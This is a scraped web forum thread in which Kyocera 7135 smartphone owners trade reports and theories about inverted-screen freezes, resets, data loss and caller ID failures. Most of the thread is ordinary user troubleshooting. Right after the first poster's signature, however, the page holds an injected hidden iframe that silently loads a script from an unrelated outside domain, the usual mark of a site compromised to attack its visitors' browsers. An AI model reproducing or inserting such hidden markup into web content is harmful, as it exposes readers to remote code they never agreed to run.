+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Reverse Screen of Death, Soft and Hard Resets, Caller ID problem...

Folks,

I know many have suffered from the caller ID problem, and many others have suffered from the soft resets (sometimes a freeze and sometimes inverted colors). I also have read other posts about the phone just slowing down and never being the same.

Mine has all three that started the same day (I had perhaps 5 soft resets in the first month of having the phone and then I started having all these problems repeatedly). Kyocera has authorized a return and I talked to someone today to do a return (I gave them my credit card, but then they never called back).

I wanted to give you all some data about this problem -- and see if we can figure this out... I think there is a pattern here, and one other person in my office who bought the phone is having the same problems (all just started, after he had the phone for 3 weeks with no problems). I think this is why this phone has not been released. This is what happens…

1) You get the phone and activate it on Verizon – you love it and load all your favorite apps. In my case this was the first month for me – I loved the phone.

2) Express Network works, but you can easily lock up the phone by switching in and out of EN programs while using it. These are known bugs that require a soft reset. Staying away from dormant connections avoids the problem.

3) After loving the phone things start to act weird.
    a. You see the intermittent caller ID problem
    b. Phone contrast never stays after you set it
    c. Phone starts having often “freezes” mostly involving an inverted screen. This will happen 5 times a day with heavy use, and happens usually when hitting a button while using your favorite Palm app.
    d. About every 5 freezes, you will loose all data, and the phone screen flickers after a soft reset – that is the sign that all data is lost.

4) To help Kyocera debug the problem, I used it while traveling for the last week. I used it without any 3rd part apps. Lockup’s still happen (sometimes when you end a call it locks up).

5) Other theories as to why this happens
    a. Someone posted that re-syncing your phone after deleting SavedPreferences and LanucherSettings solves the caller ID problem.
    b. Some theories are that apps that take over the hard buttons cause the problem.
    c. Some theories are that Alarm handling apps cause the problem.

6) My friend (also in Boston) started having all these problems a few days ago – so it does not seem to be my phone.

7) After my phone looses all data and I do a HotSync, I need to reset the phone (it prompts for this – this usually happens when an update to the Palm OS is installed – could this be the problem?). I hd the 6035 before, so I shouldn’t have any palm updates!!

I know allot about Palm development. Fatal Exceptions are a sign that an app has a problem, but locking up the Palm and inverting the display is not something we have seen on any Palms that we support (Symbol, mainly).

9) Kyocera technical service is aware of the inverted screen problem. The guy I talked to said they thought it was due to software installed. I don’t believe this is true since my phone now locks up all the time with no third party apps installed.

10) I pulled out my SD card, this seemed to make the phone work faster, but it still locked up (though not as frequently). Could this be part of the problem???

Bottom line: my phone worked great for a while then started having all these problems – it doesn’t seem to have anything to do with apps installed. I’ll have a new phone from Kyocera in a few days and can test more.

Has anyone else seen a pattern here? I really believe that this phone has some deep rooted software or hardware problems, especially since my friend is now seeing all the problems I am having. The fact that Verizon and Sprint havn't released it leads me to the same conclusion.

Thoughts?

Glenn (7135 advocate, but very, very frustrated).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have had a similiar experience. My phone worked great for almost three weeks, with only an occasional soft reset. Then I had my total blackout and hard reset and things have been buggy ever since. I still have to believe it is a problem with some app or combination of apps that is incompatible with the phone. If the problem is imedded in the combination of software, resyncing after a hard reset will only add it back. When I get the time, I am going to do a hard reset and set up a new Palm profile on my desktop and then add one app at a time. Of course, I will still need to import my Outlook calendar and phone book, so if the problem is there, I will still have the problem.

One possibility is for everyone with the problem to list all of the apps they have. We can then cross check to see which ones we all have in common. Just a thought.

Originally posted by lnoble
    I have had a similiar experience. My phone worked great for almost three weeks, with only an occasional soft reset. Then I had my total blackout and hard reset and things have been buggy ever since. I still have to believe it is a problem with some app or combination of apps that is incompatible with the phone. If the problem is imedded in the combination of software, resyncing after a hard reset will only add it back. When I get the time, I am going to do a hard reset and set up a new Palm profile on my desktop and then add one app at a time. Of course, I will still need to import my Outlook calendar and phone book, so if the problem is there, I will still have the problem.

One possibility is for everyone with the problem to list all of the apps they have. We can then cross check to see which ones we all have in common. Just a thought.
    Good idea why not start a thread with installed apps' and conduits. And what type of problems (if any) anyone has.

Originally posted by Kevinw
    Good idea why not start a thread with installed apps' and conduits. And what type of problems (if any) anyone has.
    Yes, it is an excellent idea (and no surprise that it came from a member in the DC area ). My completely UNeducated opinion is that this is Palm software related, for the most part. It's not easy spotting trends when posts are mixed within a monster thread on a semi-related subject.

Go ahead Inoble... get it started buddy :clap
    Please visit my picture site: Robert-O-Rama :)

I've had a few reverse screens and spontaneous battery discharges, but nothing to make me think its a hardware problem . . . yet.

Okay, guys, I just started a thread asking everyone suffering from 7135 problems to post the apps they are running. I went first. Let's hope that with a little detective work we can figure something out. Here is the thread
    http://www.smartphonesource.com/vbul...&threadid=5914

LNOBLE (fyi, the first letter is L, not I, for Larry. The confusion is my fault and caused by my use of lower case. I just didn't want anyone thinking I was arrogant enough to declare that I am Noble.

Everyone,

I appreciate the detective work, but I am going on record here to say that it has nothing to do with installed Palm apps.

But here’s a new data point…

I installed all my Palm apps today (after using it as a phone with nothing installed for 5 days) and I also deleted TAKEphone (on the assumption that it might be the problem -- because it takes over the address book key).

Then I adjusted the contrast – and it worked – keeps the same setting. Phone worked great for ½ hour (like it used to). I was sure it was related to TakePhone. I even played my favorite game – Joust for a full round – this is a first – the phone would lock up within 30 seconds before.

Then I called the phone and the caller ID problem was still there. After calling the phone and getting the Caller ID problem, it started locking up again any time I use a Palm app.

Now I am back to the same lockup frequency. Joust locks up all the time now immediately.

This problem seems to be related to the Palm and phone side communicating, or the Dragon ball processor and the display.

Kyocera is sending me a new phone – I should have it Monday. I’ll post more when I get it and can test.

Glenn

I have had my 7135 for about 2 weeks and just experienced the reverse screen for the first time. It was very clearly due to my SD card. It appears that the system does not like you to change SD cards while in phone mode. You need to switch over to the palm side of the house for the 7135 to properly recognize and SD card leaving and being replaced (as evidenced by the disengage card and engage card tones). Hope this helps.

If I leave my Rand McNally street atlas in the SD slot then sometimes when I open it and enter My password I get a dark screen. Never saw this with my 256 MB flash card.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Kevindbutler / larryganz,

Thanks for the input. I have tried the phone after a hard reset with no apps installed for the last 5 days and know that the problem still exists.

I have not yanked the SD card for any length of time (256 Cruzer model), though this has causd some lockups.

Will test and post results.

Glenn

My 2 points on the freezes...

I agree with Glenn that the reverse screen/lockup is not due to an app because my first reverse screen occured BEFORE ANY APP WAS INSTALLED. Only modifications made were a few addresses and bookmarks imputed into address book and browser.

My reverse screens have never occured in the same way twice...I have been in different apps, and either pressed a button or the screen.

I am still having occasional reverses and havn't had to do a hard reset yet and hope that day never comes.

Originally posted by larryganz
    If I leave my Rand McNally street atlas in the SD slot then sometimes when I open it and enter My password I get a dark screen. Never saw this with my 256 MB flash card.
    I get a reverse screen every time I open the MP3 player with a Palm Pack game card in the sd slot. It doesn't happen with a 256mb card, regardless of whether there are any mp3s on it. Is its possible the 7135 gets skiddish with preprogrammed cards?

I've read all of these posts and the only common issue I have noticed is the SC card. Is there anyone that is having significant problems that does not have an SD card? Also, for those of you with problems and an SD card, did you load MP3s and pics directly to the card (via Cruzer for example) or did you load everything through the Kyo software?

Just FYI folks, I am on my third 7135. They all have the same SW version and they all perform the same way. I have *no* third party apps and *no* SD card installed and my phone locks up. I have the caller ID issue, and EIS and Eudora Mail start locking up on me after extended EN usage.

I don't know what else to do... guess I'm stuck with a fantastic phone with problems.

Originally posted by bones boy
    Just FYI folks, I am on my third 7135. They all have the same SW version and they all perform the same way. I have *no* third party apps and *no* SD card installed and my phone locks up. I have the caller ID issue, and EIS and Eudora Mail start locking up on me after extended EN usage.

I don't know what else to do... guess I'm stuck with a fantastic phone with problems.
    hmmmmm -- What I find interesting is not that you don't have anything special on the phone, others have said that, but its that last comment that catches my interest.... I wonder if EN is messing things up, this would certainly lend itself to the "Location" theory as some areas do not have EN available yet... For example, Markito in MN does not have a Caller ID problem...Nor does he have EN. just a thought.
    iPhone therefore iAm.

Originally posted by Steve
    hmmmmm -- What I find interesting is not that you don't have anything special on the phone, others have said that, but its that last comment that catches my interest.... I wonder if EN is messing things up, this would certainly lend itself to the "Location" theory as some areas do not have EN available yet... For example, Markito in MN does not have a Caller ID problem...Nor does he have EN. just a thought.
    Yeah... that is interesting. When I get my 7135 activated Tuesday or Wednesday (whichever day I get my 7135!) I will be taking advantage of the free month of unlimited EN... but I will also be configuring my 7135 for QNC so I can do some benchmark testing on speeds to see if having EN is really worthwhile at the current rates. Maybe I'll be able to isolate some problems during the course of my testing. We shall see....... (I might have to consider moving to MN if all else fails..... at least you guys get LESS snow there )
    Please visit my picture site: Robert-O-Rama :)

I DO NOT have EN, just QNC because I am a cheapo when it comes to "to-go" data type stuff. Got plenty of Internet power/speed at home and work. Mainly use DA for 411 situations and Blazer to check sports scores occassionally, so that's good for me.

Now, on to the real reason for this post. You guys are freaking me out with all of these problems. But as an earlier poster commented (in this or another thread, I don't remember) I think the problems are the only things being mentioned. So, for this reason, I am going to start a thread requesting in the title to sound off if you've had NO problems with this phone (as is the case with me).

Originally posted by bones boy

Bones Boy,

I have some thoughts for you...from my experiences that may help.

1) Express Network is not a problem as long as you use it and shut it down before switching between phone / FaxModem / Palm apps. If you allow the connection to go "dormant" and start switching, the phone will start crashing (or the phone side will shut off). I think this is a known issue and one of the reasons that Verizon hasn't released the phone.

2) If you are having lockups / inverted screens when not connected, it could be due to hardware or software. On other Palm devices, the OS will report "Fatal Exceptions" when things go worng and require a soft reset. The 7135 just seems to freeze and sometimes invert the screen. Obviously if it happens at the same place, it is software related. In my case, it was happening in just about any Palm app at random places -- a replacement phone from Kyocera seems to have solved the problem.

3) Other people have reported that EIS freezes -- I found it so slow that I wouldn't know. Avant Go can function as an online browser and works great. I seems to work fine with the phone.

4) The caller ID problem are location dependant and I don't think there's anything we can do about this until (and if) Verizon releases and supports the phone.

Good Luck (I know this can be extremely frustrating)

Glenn

Originally posted by Steve
    ... I wonder if EN is messing things up, this would certainly lend itself to the "Location" theory as some areas do not have EN available yet...
    I have EN and don't have a problem with caller ID or frequent lockups or reverse screens.

Reverse Screen of Death, Soft and Hard Resets, Caller ID problem...

Before I go into the problems with this great device, I just wanted to set the record straight and let everyone know that I wouldn’t give up my 7135 for anything, as the great things about this phone far out way the problems that I have experienced.

Here are the problems that have plagued my 7135:

1. I get black screens at random, must of the time when this occurs, I have simply opened the phone to use the PDA functions and notice that the device is dead (I usually look at the Caller ID Display to see how long it has been that way)

2. The Brightness/Contrast of the display does not stay in sync, this is annoying (I have tried both techniques, 1. opening and closing the phone and 2. setting them from the PDA preferences screen)

3. The mp3 player’s Bass and Treble controls do not stay in sync (you can usually, but not always, just tap to bring them back in line)

4. Lately, I have seen what I guess would be the caller ID problem that people have been complaining about. When my phone rings, the name and number doesn’t display until the call is missed (This is very frustrating for me because, I don’t answer unidentified calls)

Other problems:

• Once the Datebook Appointment indicator shows up in the left upper corner, there doesn’t seem to be a way to get rid of it.
    • Video’s with sound don’t work very well.
    • The Scroll bar in Eudora Mail doesn’t work.
    • When scrolling with the up/down button in the mp3 playlist, the pointer gets confused.

Changes, I would like to see:

• The Caller ID display should show song titles when listening to mp3’s.
    • The mp3 download software should normalize song volumes.
    • The phone’s side volume buttons should control mp3 volume when the phone is closed.

What I’m using:

1). I am using a 256mb Sandisk SD Card, but I always use the included software to load mp3’s and Pictures/Movies on the phone, though, I have ordered a Cruzer with 256mb card.

2). I do not use Express Network, just qnc.

I have never done a hard reset, only soft resets.